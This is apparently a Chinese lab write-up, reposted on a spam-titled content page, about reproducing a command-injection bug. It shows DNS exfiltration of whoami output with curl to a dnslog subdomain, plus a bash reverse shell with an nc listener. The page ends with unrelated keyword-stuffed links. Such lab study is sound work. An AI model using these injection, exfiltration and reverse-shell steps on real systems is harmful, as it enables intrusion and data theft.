当前位置: 首页 > news >正文

下载建设银行官方网站下载WordPress主题开发核心主食

下载建设银行官方网站下载,WordPress主题开发核心主食,自己做报名网站教程,做直播网站需要手续任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.yayakq.cn/news/466034/

相关文章:

  • 建设部网站质量终身责任承诺书wordpress映射到外网
  • 建网站网络推广优势包装设计网站官网
  • 镇江网站推广排名做公司网站有什么亮点
  • 银川网站开发公司网络科技公司名称
  • 乔托运智能建站大专自考报名入口官网
  • 襄阳网站建设找下拉哥科技保险网官网
  • 那个网站做网站托管公众号网页怎么制作
  • 新乡网站建设哪家优惠站内关键词排名优化软件
  • 网页制作与网站建设技术大全pdf中国建筑网建筑通
  • 为什么网站百度搜不到了网站设计工资一般多少
  • 深州做网站公司关于茶叶的网站模板免费下载
  • 东莞建设局门户网站做类似淘宝的网站开发需要什么
  • 广东外贸网站推广做自己的网站要多久
  • 青岛做网站方案zencart 网站老是跳转到原地址
  • 企业网站开发课程的能力应用电子商务网站开发代码
  • 网站在线此网站三天换一次域名
  • 作品展示网站模板大连搜狗推广
  • 网站seo关键词优化技巧成都网站建设单位
  • 网站建设海报图片企业门户网站的主要技术指标
  • 台州网站快速优化排名wordpress08影院源码
  • 建设企业网站小微石家庄建设局
  • 南开区网站建设南京企业做网站
  • 做网站的客户资料交换qq群建设网站查询
  • 南宁公司网站建设游戏网官网
  • 六安网站建设 220网站建站建设
  • wordpress站点迁移wordpress实例站
  • 网站 视觉冲击给彩票网站做代理违法吗
  • 吉林省建设厅网站周军网站制作公司官网首页
  • 安徽网站优化多少钱牡丹江百姓网免费发布信息
  • 做网站基本教程深圳住房和建设局网站登录